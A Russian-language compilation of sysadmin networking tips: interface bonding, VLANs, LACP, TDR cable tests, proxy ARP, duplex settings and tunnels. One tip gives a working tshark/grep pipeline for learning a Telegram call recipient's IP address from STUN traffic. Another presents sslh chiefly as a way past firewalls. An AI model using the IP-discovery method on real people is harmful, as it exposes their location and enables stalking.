В статье рассказано, как объединить два физических сетевых интерфейса в один для увеличения пропускной способности или для повышения отказоустойчивости сети. В Linux это делается при помощи модуля bonding и утилиты ifenslave. В большинстве новых версий дистрибутивов модуль ядра bonding уже есть и готов к использованию, в некоторых вам придется собрать его вручную. Я настраивал данное решение на Ubuntu 8.04 server amd64, поэтому примеры установки ПО взяты оттуда. Установим нужное ПО: aptitude install ifenslave ethtool Затем добавим модуль bonding в автозагрузку и пропишем опции для его запуска, для этого в конец файла /etc/modules добавим текст из примера ниже, примеров будет два: для создания одного интерфейса из двух физических и для создания двух интерфейсов из четырех физических. Подробнее о режимах работы bonding можно почитать здесь. Пример для одного виртуального интерфейса из двух физических: alias bond0 bonding options bonding mode=0 miimon=100 Пример для создания двух интерфейсов из четырех физических: alias bond0 bonding alias bond1 bonding options bonding mode=0 miimon=100 max_bonds=2 Затем загрузим модуль bonding ## Один виртуальный интерфейс modprobe bonding mode=0 miimon=100 ## Два виртуальных интерфейса modprobe bonding mode=0 miimon=100 max_bonds=2 Настроим параметры сетевых интерфейсов bonding`a, для этого отредактируем файл настроек интерфейсов /etc/network/interfaces. В примере шаблоны для настройки двух виртуальных интерфейсов. # The bond0 network interface auto bond0 allow-hotplug bond0 iface bond0 inet static address <ip-address> netmask <netmask> network <network-address> broadcast <broadcast-address> gateway <gateway-address> dns-nameservers <nameserver-one> <nameserver-two> dns-search <domain-name> up /sbin/ifenslave bond0 eth0 up /sbin/ifenslave bond0 eth1 # The bond1 network interface auto bond1 allow-hotplug bond1 iface bond1 inet static address <ip-address> netmask <netmask> network <network-address> broadcast <broadcast-address> gateway <gateway-address> dns-nameservers <nameserver-one> <nameserver-two> dns-search <domain-name> up /sbin/ifenslave bond1 eth2 up /sbin/ifenslave bond1 eth3 Более подробно по опциям файла /etc/network/interfaces можно прочитать выполнив команду man interfaces После того как прописаны настройки интерфейсов нужно перезапустить сеть командой /etc/init.d/networking restart и проверить, поднялись ли интерфейсы bond0, и если настраивали два, то bond1.

Превращение Cisco Catalyst 6500 в кабельный тестер (доп. ссылка 1) Автор: Gleb Poljakov [комментарии]

Некоторые карты для Cisco Catalyst имеют встроенный "кабельный тестер" - Time Domain Reflectometry (TDR). TDR может использоваться для определения обрывов в кабеле, неверно обжатых коннекторов, повреждений изоляции и др. TDR поддерживается следующими медными линейными картами: WS-X6748-GE-TX (48 port CEF720 10/100/1000 line card) WS-X6548-GE-TX/45AF (48 port CEF256 10/100/1000 line card) WS-X6148A-GE-TX/45AF (48 port Classic 10/100/1000 line card) WS-X6148-GE-TX/45AF (48 port Classic 10/100/1000 line card) WS-X6148A-RJ-45/45AF (48 port Classic 10/100 line card) Для тестирования кабеля необходимо выполнить две команды: 1. Первая - команда на тестирование порта: 6K-LV2-CL3# test cable-diagnostics tdr interface g1/3 TDR test started on interface Gi1/3 A TDR test can take a few seconds to run on an interface Use 'show cable-diagnostics tdr' to read the TDR results. 2. Вторая - вывод данных тестирования: 6K-LV2-CL3# show cable-diagnostics tdr interface g1/3 TDR test last run on: March 5 10:22:06 Interface Speed Pair Cable length Distance to fault Channel Pair status Gi1/3 1000 1-2 1 +/- 6 m N/A Pair B Terminated 3-4 1 +/- 6 m N/A Pair A Terminated 5-6 1 +/- 6 m N/A Pair C Terminated 7-8 1 +/- 2 m N/A Pair D Short в данном тесте пара 7-8 оказалась оборвана. Ссылки: http://www.cisco.com/en/US/prod/collateral/switches/ps5718/ps708/prod_white_paper0900aecd805457cc.html

Конфигурирование bonding для сетевых интерфейсов на RHEL/CentOS 5 (доп. ссылка 1) Автор: Roman Sozinov [комментарии]

Конфигурация необходимых сетевых интерфейсов: * eth0 # cat > /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 BOOTPROTO=none ONBOOT=yes MASTER=bond0 SLAVE=yes USERCTL=no [Ctrl+D] * eth1: # cat > /etc/sysconfig/network-scripts/ifcfg-eth1 DEVICE=eth1 BOOTPROTO=none ONBOOT=yes MASTER=bond0 SLAVE=yes USERCTL=no [Ctrl+D] * bond0: # cat > /etc/sysconfig/network-scripts/ifcfg-bond0 DEVICE=bond0 BOOTPROTO=none ONBOOT=yes NETWORK=10.10.70.0 IPADDR=10.10.70.77 NETMASK=255.255.255.0 USERCTL=NO [Ctrl+D] Загружаем модуль и перегружаем сеть: # cat >> /etc/modprobe.conf alias bond0 bonding options bond0 mode=1 miimon=100 [Ctrl+D] # service network restart Просмотр статуса: # cat /proc/net/bonding/bond0 Ethernet Channel Bonding Driver: v3.2.4 (January 28, 2008) Bonding Mode: fault-tolerance (active-backup) Primary Slave: None Currently Active Slave: eth1 MII Status: up MII Polling Interval (ms): 100 Up Delay (ms): 0 Down Delay (ms): 0 Slave Interface: eth0 MII Status: up Link Failure Count: 2 Permanent HW addr: 00:1b:11:50:7a:01 Slave Interface: eth1 MII Status: up Link Failure Count: 1 Permanent HW addr: 00:18:fe:8c:a1:96

Конфигурирование VLAN в RHEL/CentOS/Fedora и Debian/Ubuntu (доп. ссылка 1) (доп. ссылка 2) Автор: Roman Shramko [комментарии]

Ниже представлены примеры настройки VLAN через стандартные средства дистрибутивов Linux. RHEL, CentOS, Fedora Для начала необходимо описать базовый сетевой интерфейс, на котором мы будем поднимать VLAN. /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 # здесь нужно указать реальное имя интерфейса BOOTPROTO=static HWADDR=00:07:E9:A7:13:48 # здесь нужно указать реальный MAC ONBOOT=no TYPE=Ethernet IPADDR=0.0.0.0 NETMASK=255.255.255.0 Дла наших целей важны только два параметра: DEVICE и HWADDR. Остальное роли не играет. Можно даже заполнить "от балды". Далее, создаем подинтерфейсы для VLAN. Именование подинтерфейсов может быть двух видов: "vlanX" и "eth0.X". В первом случае, мы имеем описательное имя, которое не привязано к имени родительского интерфейса. Соответственно, перемещение VLAN на другой физический интерфейс не требует значительных изменений в конфигурацию системы (не нужно править правила пакетного фильтра и тд и тп). С другой стороны, при использовании имен вида "eth0.X" мы имеем более удобное (по моему мнению) имя интерфейса, по которому видно на каком родительском интерфейсе поднят VLAN, чем немного упрощается администрирование системы. Плюс, поскольку имя подинтерфейса базируется на имени физического, то мы имеем различные пространства имен для VLAN-ов. Я имею ввиду ситуацию, когда на разных интерфейсах приходят VLAN-ы с одинаковыми номерами. Использование "vlanX" в данном случае будет несколько затруднительно. Минусом будет то, что некоторые утилиты некорректно работают с именами интерфейсов с точкой в имени (например sysctl). Конфигурирование интерфейсов типа "vlanX" /etc/sysconfig/network-scripts/ifcfg-vlan10 VLAN=yes VLAN_NAME_TYPE=VLAN_PLUS_VID_NO_PAD DEVICE=vlan10 PHYSDEV=eth0 BOOTPROTO=static ONBOOT=yes TYPE=Ethernet IPADDR=10.10.10.2 NETMASK=255.255.255.252 Здесь: PHYSDEV - физический интерфейс, на котором работает VLAN. VLAN_NAME_TYPE - указываем тип наименование устройства. В данном случае номер VLAN будет браться с имени устройства. Возможные варианты: VLAN_PLUS_VID -vlan0010 VLAN_PLUS_VID_NO_PAD - vlan10 DEV_PLUS_VID - eth0.0010 DEV_PLUS_VID_NO_PAD - eth0.10 Конфигурирование интерфейсов типа "eth0.X" /etc/sysconfig/network-scripts/ifcfg-eth0.10 VLAN=yes DEVICE=eth0.10 BOOTPROTO=static ONBOOT=yes TYPE=Ethernet IPADDR=10.10.10.2 NETMASK=255.255.255.252 Все то же самое, но без PHYSDEV и VLAN_NAME_TYPE. Хочеться добавить, что смешать в одной системе "vlanX" и "eth0.X" штатными средствами вряд ли получится, т.к. тип именования (VLAN_NAME_TYPE) при инициализации интерфейсов задается по первому поднимаемому интерфейсу. Примеры для Debian, Ubuntu. Устанавливаем поддержку vlan: sudo apt-get install vlan В /etc/network/interfaces добавляем: # Какие интерфейсы поднимать автоматически auto vlan4 auto vlan5 auto vlan101 # VLAN 4 iface vlan4 inet static address 192.168.0.8 netmask 255.255.255.192 network 192.168.0.0 broadcast 192.168.0.63 mtu 1500 vlan_raw_device eth0 # VLAN 5 iface vlan5 inet static address 10.0.111.8 netmask 255.255.255.0 network 10.0.111.0 broadcast 10.0.111.255 mtu 1500 vlan_raw_device eth0 # VLAN 101 iface vlan101 inet static address 172.12.101.8 netmask 255.255.255.0 network 172.12.101.0 broadcast 172.12.101.255 gateway 172.12.101.1 mtu 1500 vlan_raw_device eth0

Восстановление потерянного Ethernet линка в Linux [комментарии]

В офисе внезапно отключили электроэнергию. На одном из работающих в тот момент ноутбуков, после восстановления электричества, отказался подниматься сетевой линк. На свиче отображалось отсутствие физического линка. Замена патч-корда, переключение в другой порт, жесткая перезагрузка - не помогли. # mii-tool eth0 eth0: no link Пробуем инициировать autonegotiation: # mii-tool -r eth0 бесполезно. Решаемся испробовать опцию -R для переинициализации трансивера. # mii-tool -R eth0 и, о чудо !, линк поднялся.

MAC DNS лист Автор: Vladimir Shingarev [комментарии]

Иногда нужно узнать какому производителю принадлежит оконечное оборудование, наблюдая только его мак на интерфейсе. А открывать браузер для этого лениво. В таком случае удобно создать MAC-based dns лист. Пользоваться просто: ket:/home/sva# host -t txt 001243.macl.nov.ru 001243.macl.nov.ru descriptive text "Cisco" ket:/home/sva# host -t txt 0050ba.macl.nov.ru 0050ba.macl.nov.ru descriptive text "D-LINK"

Объединение сетевых интерфейсов при помощи протокола LACP во FreeBSD 7 (доп. ссылка 1) Автор: s@sh@ [комментарии]

Собираем ядро с поддержкой LACP (Link aggregation control protocol): device lagg Объединяем интерфейсы em0 и em1: ifconfig em0 up ifconfig em1 up ifconfig lagg0 create ifconfig lagg0 up laggproto lacp laggport em0 laggport em1 ifconfig lagg0 10.10.10.18 netmask 255.255.255.0 route add -net 0.0.0.0 10.10.10.1 0.0.0.0 На Cisco и к каждому нужному интерфейсу прописываем: interface GigabitEthernet2/2 .... channel-protocol lacp channel-group 23 mode active interface GigabitEthernet2/16 .... channel-protocol lacp channel-group 23 mode active

Настройка Linux как Wifi шлюза для КПК (доп. ссылка 1) Автор: Михаил Конник [комментарии]

Linux шлюз: Нужно создать простую одноранговую ad-hoc сеть и дать статический IP-адрес сетевому беспроводному интерфейсу. После этого делаем NAT и всё работает. Для беспроводного интерфейса eth3 и сети с идентификатором virens команда выглядит так (от рута): # iwconfig eth3 mode Ad-Hoc channel 1 essid virens В /etc/network/interfaces пишем что-то вроде: auto eth3 iface eth3 inet static address 10.106.146.1 netmask 255.255.255.0 wireless-mode ad-hoc wireless-channel 1 wireless-rate auto wireless-essid virens Теперь делаем NAT: # echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -t nat -A POSTROUTING --out-interface eth1 -j MASQUERADE При этом eth1 это интерфейс, который подключён к Интернету. Соединение не шифруется. КПК: Необходимо задать essid - такой же, какой дали в iwconfig. Шифрование отсутствует, тип сети - одноранговая ad-hoc. Снимаем галку "Получать IP-адрес автоматически" и вводим адреса: IP-адрес: 10.106.146.2 Маска подсети: 255.255.255.0 Маршрутизатор: 10.106.146.1

Как "протянуть" 802.1q tagged порт через ip-сеть. Автор: Roman Timofeev aka ^rage^ [комментарии]

Дано: Есть hostA, который воткнут в каталист, в trunk (т.е. тегированный) порт, инкапсуляция 802.1q. Есть hostB, который маршрут до hostA. маршрут живой, ip-пакеты между хостами безпроблемно бегают. Задача: надо с hostA "притащить" виланы на hostB. Решение: vtund + bridge. описание клиента в vtund.conf homepeer { passwd qwerty; type ether; device home; proto tcp; compress yes; stat yes; persist yes; up { ifconfig "%% up"; program "brctl addbr br0"; program "brctl addif br0 %%"; program "brctl addif br0 eth0"; ifconfig "br0 up"; }; down { ifconfig "%% down"; ifconfig "br0 down"; program "brctl delbr br0"; }; } описание пира из конфига сервера homepeer { passwd qwerty; # Password type ether; # Ethernet tunnel device work; # Device tap1 proto tcp; compress yes; up { ifconfig "%% up"; }; down { ifconfig "%% down"; }; } Теперь на той Linux машине, куда кидаем порт: vconfig set_name_type VLAN_PLUS_VID_NO_PAD vconfig add work 4 ifconfig vlan4 10.1.1.1 netmask 255.255.255.0 up vconfig add vlan4 8 ifconfig vlan8 192.168.1.1 netmask 255.255.255.0 up Замечание: Клиент - хост, с которого мы тащим порт. Он живёт в серой сети и имеет выход в internet через NAT. Сервер - машина с публичным ip.

Сброс счетчиков ifconfig в Linux Автор: OlegOS (Очередин Олег) [комментарии]

Если нужно сбросить счетчики пакетов/байт, отображаемые ifconfig, то есть из /proc/net/dev, нужно собрать драйвер сетевой карты в виде модуля (не в ядро). Для сброса опускаем интерфейс, выгружаем драйвер, загружаем снова и поднимаем интерфейс. Должно работать на всех картах. Пример. ifdown eth0 modprobe -r eepro100 modprobe eepro100 ifup eth0 Для того чтобы узнать имя драйвера обеспечивающего работу сетевого интерфейса: ethtool -i eth1

Привязка имени сетевого интерфейса к MAC адресу в Linux (доп. ссылка 1) [комментарии]

При наличии нескольких одинаковых сетевых карт, чтобы гарантировать, что eth0, eth1,.. всегда будут закреплены за одними и теми же картами, можно огранизовать привязку имени к MAC адресу: В /etc/mactab добавляем: eth0 00:23:B7:89:39:E2 eth1 00:08:A3:20:F8:29 eth2 00:50:BA:29:B7:32 Для Debian GNU/Linux создаем скрипт /etc/network/if-pre-up.d/nameif #!/bin/sh PATH=/sbin nameif -c /etc/mactab Для других Linux дистрибутивов нужно на начальном этапе инициализаци выполнить: /sbin/nameif eth0 00:23:B7:89:39:E2 /sbin/nameif eth1 00:08:A3:20:F8:29 /sbin/nameif eth2 00:50:BA:29:B7:32

Как настроить сетевой мост во FreeBSD [комментарии]

Предположим, имеется несколько сетевых интерфейсов fxp0,fxp1,fxp2,fxp3 вы хотите чтобы ваша машина выспупала в качестве сетевого моста: Первый способ на основе if_bridge(работает в 5-STABLE и 6-ке) # kldload if_bridge # ifconfig bridge0 create # ifconfig bridge0 addm fxp0 addm fxp1 addm fxp2 addm fxp3 up # ifconfig fxp0 up # ifconfig fxp1 up # ifconfig fxp2 up # ifconfig fxp3 up Посмотреть # ifconfig bridge0 Подробнее в man if_bridge и man ifconfig Второй способ на основе bridge: # kldload bridge # sysctl net.link.ether.bridge.config=fxp0,fxp1,fxp2,fxp3 # sysctl net.link.ether.bridge.enable =1

Управление дуплексным режимом и скоростью линка в различных ОС. (доп. ссылка 1) [комментарии]

Solaris Проверка: ndd /dev/hme link_mode 0 = half duplex, 1 = full duplex Установка full duplex: ndd -sec /dev/hme adv_100fdx_cap ndd -set /dev/hme adv_autoneg_cap 0 Установка half duplex: ndd -sec /dev/hme adv_100hdx_cap ndd -set /dev/hme adv_autoneg_cap 0 Linux Текущее состояние mii-tool eth0 ethtool eth0 Установка full duplex: mii-tool -F 100baseTx-FD eth0 ethtool -s eth0 speed 1000 duplex full autoneg off некоторые драйверы можно настроить через /etc/modules.conf options eepro100 options=48 options 3c59x options=0x204 full_duplex=0x200 FreeBSD Установка full duplex: ifconfig xl0 media 100baseTX mediaopt full-duplex Установка half duplex: ifconfig xl0 media 100baseTX mediaopt half-duplex IBM AIX Список адаптеров и проверка режима: lsdev -HCc adapter lsattr -d ent# Установка full duplex: chdev -l ent# -a media_speed=100_Full_Duplex -P Установка half duplex: chdev -l ent# -a media_speed=100_Half_Duplex -P HP-UX Список адаптеров и проверка режима: lanscan -n (HP-UX 10.x) lanscan -p (HP-UX 11.x) lanadmin -x NMid# (HP-UX 10.x) lanadmin -x PPA# (HP-UX 11.x) Установка full duplex: lanadmin -X 100FD NMid# (HP-UX 10.x) lanadmin -X 100FD PPA# (HP-UX 11.x) Установка half duplex: lanadmin -X 100HD NMid# (HP-UX 10.x) lanadmin -X 100HD PPA# (HP-UX 11.x)

Проброс трафика через Linux машину используя Proxy ARP (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Пусть: x.x.x.96/28 - выделенная подсеть, которую нужно распределить по машинам в локальной сети. x.x.x.97 - IP внешнего шлюза. Требуется поставить между шлюзом и сетью фаервол, с одним адресом на двух интерфейсах x.x.x.98, транслируя ARP трафик используя "Proxy ARP". (x.x.x.99 ... x.x.x.110) --- (eth1, x.x.x.98 | eth0, x.x.x.98) --- (x.x.x.97) Удаляем маршруты созданные по умолчанию. ip route del x.x.x.96/28 dev eth0 ip route del x.x.x.96/28 dev eth1 Пакеты для x.x.x.97 пускаем через eth0, а для x.x.x.96/28 через eth1 ip route add x.x.x.97 dev eth0 ip route add x.x.x.96/28 dev eth1 Включаем Proxy ARP echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp echo 1 > /proc/sys/net/ipv4/conf/eth1/proxy_arp

Объединение сетевых интерфейсов под Linux (доп. ссылка 1) [комментарии]

Превращение двух 100 мбит/c сетевых карт в одну виртуальную, с пропускной способностью 200 мбит/c. Документация: Documentation/networking/bonding.txt в дереве исходных текстов ядра и "modinfo bonding". Кратко: Подгружаем модуль ядра "bonding", в /etc/modules.conf указываем alias bond0 bonding При желании устанавливаем опции для доп. настройки модуля, например: options bond0 mode=2, где mode= 0 - balance-rr (Round-robin выбор интерфейса) 1 - active-backup (работает только один интерфейс, остальные в режиме горячей замены) 2 - balance-xor - для всех пересылок на MAC закрепляется один из интерфейсов 3 - broadcast - трафик идет через оба интерфейса одновременно 4 - 802.3ad - для коммутаторов с поддержкой IEEE 802.3ad Dynamic link aggregation 5 - balance-tlb, 6 - balance-alb /sbin/ifconfig bond0 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255 up /sbin/ifenslave bond0 eth0 /sbin/ifenslave bond0 eth1 Или для дистрибутивов в которых используется пакет initscripts (http://rhlinux.redhat.com/initscripts/): /etc/sysconfig/network-scripts/ifcfg-bond0 DEVICE=bond0 BOOTPROTO=static BROADCAST=192.168.63.255 IPADDR=192.168.1.1 NETMASK=255.255.255.0 NETWORK=192.168.0.0 ONBOOT=yes /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 BOOTPROTO=static ONBOOT=yes MASTER=bond0 SLAVE=yes USERCTL=no /etc/sysconfig/network-scripts/ifcfg-eth1 DEVICE=eth1 BOOTPROTO=static ONBOOT=yes MASTER=bond0 SLAVE=yes USERCTL=no

Объединение сетевых интерфейсов под FreeBSD 5.x (доп. ссылка 1) Автор: Мишка [комментарии]

Превращение двух 100 мбит/c сетевых карт в одну виртуальную, с пропускной способностью 200 мбит/c . kldload /boot/kernel/ng_ether.ko kldload /boot/kernel/ng_one2many.ko ifconfig rl0 up ifconfig rl1 up ngctl mkpeer rl0: one2many upper one ngctl connect rl0: rl0:upper lower many0 ngctl connect rl1: rl0:upper lower many1 ngctl msg rl1: setpromisc 1 ngctl msg rl1: setautosrc 0 ngctl msg rl0:upper \ setconfig "{ xmitAlg=1 failAlg=1 enabledLinks=[ 1 1 ] }" ifconfig rl0 inet 192.168.0.78

Привязка IP к MAC адресу (доп. ссылка 1) Автор: Krigs [комментарии]

Я сделал так (идею тоже нашел на этом сайте): 1. Создал файл б/д привязки IP к MAC (например /etc/ethers.local) Пример строк из файла: 192.168.0.11 00:0c:6e:3f:cd:e5 #kasa2 192.168.0.12 00:0d:88:82:da:a2 #mobil и т. д. 2. Написал скрипт такого содержания: (например /etc/static.arp): #!/bin/sh # обнуляем всю таблицу arp arp -ad > null # к каждому компу в локальной сети привязываем несуществующий (нулевой) # MAC адрес I=1 while [ $I -le 254 ] do arp -s 192.168.0.${I} 0:0:0:0:0:0 I=`expr $I + 1` done # к реально существующему компу в сети из базы данных в файле # /etc/ethers.local привязываем # правильный MAC адрес arp -f /etc/ethers.local 3. Делаем этот файл исполняемым и прописываем в файл /etc/rc.local такую строчку: /etc/static.arp Еще желательно, чтобы привязки имен юзерских хостов к ip-адресам были прописаны в /etc/hosts (это ускорит их поиск). Теперь сервер не будет рассылать широковещательные запросы о локальных MAC адресах, т. к. все они статически жестко привязаны к ip-адресам. Этим убивается два зайца: не рассылаются широковещательные запросы, что экономит траффик и время на ответ сервера, и не позволяет пользователю менять свой ip-адрес, т. к. сервер все равно пакет будет отправлять на жестко привязанный MAC адрес.

Включение Device Polling в FreeBSD (доп. ссылка 1) [комментарии]

man polling - периодических опрос состояния ядром, вместо генерации прерываний (полезно при очень большом числе пакетов проходящих через сетевую карту), возможен комбинированный вариант, когда polling включается при преодалении определенного порога нагрузки). В конфигурации ядра options DEVICE_POLLING options HZ=1000 Далее: sysctl kern.polling.enable=1 sysctl kern.polling.user_frac=50

Смена скорости (10/100) и duplex (full/half) на сетевых картах Realtek-8139 Автор: Alexey N. Kovyrin [комментарии]

1) Duplex можно менять параметром full-duplex модуля 8139too: full-duplex=1 (Full-Duplex) full-duplex=0 (Half-Duplex) 2) Также существует параметр media, который является набором битовых полей: 5-й бит: 1=100Mbps / 0=10Mbps 4-й бит: 1=Full-Duplex / 0=Half-Duplex 9-й бит: Форсированная установка параметра duplex (1=Force / 0=Don't Force) 9-й бит используется только вместе с 4-м. 3) Примеры: modprobe 8139 full-duplex=1 (100Mbps Full-Duplex) modprobe 8139 full-duplex=0 (100Mbps Half-Duplex) modprobe 8139 media=16 (10Mbps Full-Duplex) modprobe 8139 media=48 (100Mbps Full-Duplex) modprobe 8139 media=32 (100Mbps Half-Duplex) modprobe 8139 media=32 (100Mbps Half-Duplex) modprobe 8139 media=0 (10Mbps Half-Duplex)

С чем может быть связаны потери пакетов и нестабильная работа ethernet карт ? (доп. ссылка 1) [комментарии]

Приходилось сталкиваться с проблемами согласования режимов работы карт Intel EtherExpress 100 и Reltek RTL-8139 c коммутаторами и концентраторами различных производителей. Несогласование проявляется, например в работе карты в режиме half-duplex, а свича в full-duplex и т.д. (в linux: /sbin/mii-tool -F 100baseTx-FD eth0)

Как в Linux выставить принудительно 100Mb FullDuplex для Intel EtherExpress Pro100, а то auto-select с некоторыми свичами не работает. (доп. ссылка 1) [обсудить]

/sbin/mii-tool -F 100baseTx-FD eth0 или ethtool -s eth0 speed 100 duplex full autoneg off Для модуля: В /etc/modules.conf: options eepro100 options=0x200 full_duplex=1 alias eth0 eepro100 insmod eepro100.o debug=1 options=0x200 Для ядра в boot приглашении: ether=0,0,0x200,eth0 PS. Для драйвера версии меньше 1.14 (mod_info -a eepro100) вместо 0x200 следует писать 0x30.

Почему выкачиваются данные с машины нормально, как только пытаюсь что-то закачать - соединение останавливается, даже через ssh больше 5 мин. не удается поработать. Другие машины работают нормально. [комментарии]

Неоднократно замечена проблема работы сетевых карт на базе RealTek 8129/8139 (машины под FreeBSD, но с другими ОС тоже проявляется) с некоторыми концентраторами и коммутаторами. Проявляется в замирании сессий до истечения таймаута. Диагностика: ping -s N remote_ip, при больших N не проходят. Решение: Смените сетевую карту, например, на Intel EtherExpress Pro.

Как переключить сетевую карту в FreeBSD из full-duplex в half-duplex [комментарии]

Текущий режим работы сетевой карты можно посмотреть выполнив: # ifconfig fxp0 Перевести сетевую карту в режим работы 10baseT/UTP half-duplex: # ifconfig fxp0 media 10baseT/UTP mediaopt half-duplex Автоматически выбрать режим: # ifconfig fxp0 media autoselect Подробнее: man 4 ed, man 4 rl, man 4 fxp

Объединение сетевых интерфейсов в Gentoo Linux (доп. ссылка 1) Автор: Sheridan [комментарии]

Довольно часто бывает, что пропускной способности не хватает. Если у вас нет гигабитной сетевой карты (или порта на свиче), не расстраивайтесь. Можно вставить в компьютер еще 1-2 сетевухи и объединить интерфейсы в один. Данная операция называется bonding. Так как под рукой у меня только Gentoo, то могу привести алгоритм объединения интерфейсов только для него. Итак. 1. emerge ifenslave 2. Редактируем /etc/conf.d/net: 2.1 Комментируем текущий конфиг 2.2 Пишем следующее: slaves_bond0="eth0 eth1" config_bond0=( "192.168.1.101 netmask 255.255.255.0 brd 192.168.1.255" ) routes_bond0=( "default gw 192.168.1.11" ) config_bond0 и routes_bond0 берем из закомментированного конфига (скорее всего это будет config_eth0 и routes_eth0). То есть настраиваем bond0 как обычный интерфейс 3. Делаем симлинк из /etc/init.d/net.lo в /etc/init.d/net.bond0 4. Проверяем: ~# /etc/init.d/net.eth0 stop ~# /etc/init.d/net.bond0 start 5. Если все нормально, то добавляем старт интерфейса при загрузке ~# rc-update -d net.eth0 ~# rc-update -a net.bond0 boot Все, скорость линка должна возрасти.

Дублирование сервера с использованием VRRP (доп. ссылка 1) Автор: Ron McCarty [комментарии]

Имеется два сервера - первичный и запасной. При помощи протокола VRRP (Virtual Router Redundancy Protocol) при крахе первичного сервера, автоматически поднимаем его MAC и IP на запасном. Устанавливаем vrrpd (http://sourceforge.net/projects/vrrpd/). На первичном сервере выполняем: vrrpd -i eth0 -p 25 -v 1 192.168.1.1 На запасном: vrrpd -i eth0 -p 24 -v 1 192.168.1.1 ,где -i eth0 - имя интерфейса на котором будет установлен IP 192.168.1.1 -v 1 - (virtual router) номер VRRP связки (в локальной сети может быть несколько резервирующих друг-друга систем) -p N - приоритет, машина с меньшим весом будет активирована, только при недоступности системы с большим весом. При тестировании можно использовать tcpdump -vv proto 112

Как привязать IP к MAC-адресу сетевой карты (доп. ссылка 1) Автор: Dima I. Allaverdov [комментарии]

arp -s ваш.ip.адрес mac.адрес.сетевой.карты pub Пример: /usr/sbin/arp -s 192.168.0.10 0:0:e7:ac:4c:63 pub Начиная с FreeBSD 4.10 в ifconfig доступна опция staticarp, заставляющий интерфейс только отвечать на ARP запросы для привязанных к нему адресам.

NAT, трансляция адресов

Определение IP-адреса пользователя в Telegram через голосовой вызов (доп. ссылка 1) (доп. ссылка 2) [комментарии]

По умолчанию Telegram устанавливает прямой канал связи при осуществлении голосового вызова пользователя, присутствующего в адресной книге (в настройках можно выборочно отключить использование P2P и направлять трафик только через внешний сервер). При инициировании соединения для обхода NAT в Telegram применяется протокол STUN (Session Traversal Utilities for NAT), который передаёт информацию об адресах звонящего и принимающего звонок в поле XOR-MAPPED-ADDRESS. Соответственно, если в настройках "Security and Privacy" не отключён P2P, звонящий может узнать IP-адрес того, кому адресован звонок. Метод подойдёт и для любых других приложений, использующих STUN. Для определения IP-адреса следует во время осуществления вызова записать дамп трафика в формате pcap, например, при помощи утилиты tcpdump или tshark, после чего воспользоваться готовым скриптом https://github.com/n0a/telegram-get-remote-ip/ или при помощи штатных утилит проанализировать значение поля XOR-MAPPED-ADDRESS: tshark -w dump.pcap -a duration:5 cat dump.pcap | grep "STUN 106" | sed 's/^.*XOR-MAPPED-ADDRESS: //' | awk '{match($0,/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/); ip = substr($0,RSTART,RLENGTH); print ip}' | awk '!seen[$0]++'

Мультиплексирование ssl/ssh соединений через один 443 порт (доп. ссылка 1) [комментарии]

В рамках проекта sslh (http://www.rutschle.net/tech/sslh.shtml) развивается мультиплексор ssl/ssh соединений, способный принимать соединения на одном порту и перебрасывать их в зависимости от типа протокола. Поддерживается широкий спектр протоколов, среди которых HTTP, HTTPS, SSH, OpenVPN, tinc и XMPP. Наиболее востребованным применением sslh является обход межсетевых экранов, допускающих только ограниченное число открытых портов. Например, запустив sslh за пределами межсетевого экрана на 443 порту, можно организовать работу SSH и любых других протоколов: соединение с внешней системы будет производиться на 443 порт, но пробрасываться на локальный 22 порт, при этом штатные HTTPS-запросы будут перебрасываться на localhost:443. Для обеспечения работы такой схемы sslh следует запустить с опциями: sslh --user sslh --listen 192.168.10.15:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 где, "--user sslh" определяет пользователя, под которым следует запустить sslh; "--listen 192.168.10.15:443" - IP и порт для приёма внешних соединений; "--ssh 127.0.0.1:22" - IP и порт для проброса SSH "--ssl 127.0.0.1:443" - IP и порт для проброса HTTPS

Проброс 802.1q/access порта в Linux через IP-сеть Автор: Roman Timofeev [комментарии]

В 2007 году я написал заметку с похожим названием. Тогда использовалась userspace-реализация с tap-интерфейсом и демоном vtund. Особой производительностью этот вариант не отличался. В свежих ядрах Linux появилась поддержка l2tpv3 ethernet pseudowire. Организуем l2-линк с udp-инкапсуляцией между двумя хостами laptus и gw: laptus# ip l2tp add tunnel tunnel_id 1 peer_tunnel_id 1 udp_sport 5000 \\ udp_dport 5000 encap udp local 192.168.1.39 remote 213.x.x.x laptus# ip l2tp add session tunnel_id 1 session_id 1 peer_session_id 1 laptus# ip a a 192.168.30.2/24 dev l2tpeth0 gw# ip l2tp add tunnel tunnel_id 1 peer_tunnel_id 1 udp_sport 5000 \\ udp_dport 11932 encap udp local 213.x.x.x remote 188.134.x.x gw# ip l2tp add session tunnel_id 1 session_id 1 peer_session_id 1 gw# ip a a 192.168.30.1/24 dev l2tpeth0 (так как машина laptus на NAT, то пришлось сначала сконфигурировать туннель на нём и запустить ping 192.168.30.1 и на внешнем интерфейсе gw "подсмотреть" ip:port, в который оттранслировались пакеты на выходе. Если у вас на обоих концах публичные ip - всё просто). Теперь попробуем сделать что-то полезное: laptus# ip link add link l2tpeth0 name vlan5 type vlan id 5 laptus# ip link add link l2tpeth0 name vlan6 type vlan id 6 laptus# ip a a dev vlan5 10.1.5.2/24 laptus# ip a a dev vlan6 10.1.6.2/24 gw# ip link add link l2tpeth0 name vlan5 type vlan id 5 gw# ip link add link l2tpeth0 name vlan6 type vlan id 6 gw# ip a a dev vlan5 10.1.5.1/24 gw# ip a a dev vlan6 10.1.6.1/24 laptus# ping 10.1.6.1 PING 10.1.6.1 (10.1.6.1) 56(84) bytes of data. 64 bytes from 10.1.6.1: icmp_req=1 ttl=64 time=5.77 ms 64 bytes from 10.1.6.1: icmp_req=2 ttl=64 time=13.4 ms 64 bytes from 10.1.6.1: icmp_req=3 ttl=64 time=17.6 ms ^C --- 10.1.6.1 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2002ms rtt min/avg/max/mdev = 5.776/12.295/17.671/4.922 ms при этом tcpdump -e -n -i l2tpeth0 на gw покажет: 16:44:30.055082 b2:19:70:63:90:85 > 76:a9:12:12:c7:30, ethertype IPv4 (0x0800), length 98: 192.168.30.2 > 192.168.30.1: ICMP 